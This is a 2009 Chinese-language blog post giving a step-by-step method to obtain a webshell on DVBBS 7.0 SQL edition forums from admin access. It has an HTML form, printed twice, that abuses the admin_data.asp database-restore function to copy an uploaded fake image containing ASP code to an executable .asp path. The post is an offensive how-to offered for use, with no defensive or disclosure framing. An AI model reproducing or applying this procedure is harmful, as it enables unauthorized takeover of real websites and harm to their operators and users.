对于DVBBS7.0 SQL版得到后台获取webshell过程

2009年8月12日星期三 | | |

SQL版的利用

  还是在发帖那上传一个写有asp代码的假图片,然后记住其上传路径,比如UploadFile/2004-6/20046272411024.jpg,写一个本地提交的表单,代码如下:
code:
<form action="http://[target_url]/admin_data.asp?action=RestoreData&act=Restore" method="post">
<p>已上传文件的位置:<input name="Dbpath" type="text" size="80"></p>
<p>要复制到的位置:<input name="backpath" type="text" size="80"></p>
<p><input type="submit" value="提交"></p>
</form>

<form action="http://[target_url]/admin_data.asp?action=RestoreData&act=Restore" method="post">
<p>已上传文件的位置:<input name="Dbpath" type="text" size="80"></p>
<p>要复制到的位置:<input name="backpath" type="text" size="80"></p>
<p><input type="submit" value="提交"></p>
</form>

   然后就把UploadFile/2004-6/20046272411024.jpg填在"已上传文件的位置"那里,想要在哪里搞个WebShell就 把完整的相对路径填写在"要复制到的位置"那里,比如:images/angel.asp提交就得到我们可爱的WebShell了

wellcom to my blog space : http://ytfso.yi.org
我的QQ空间
带倒记时的js跳转代码
function times() {for (i=4;i>0;i++) {setTimeout('reli...
 

0 评论:

发表评论

订阅: 博文评论 (Atom)

所有文章收集于网络,如果有牵扯到版权问题请与本站站长联系。谢谢合作![email protected]

 
Glossy Blue by N.Design Studio
Blogger Templates by Blogcrowds | Glossy Blue Blogger Template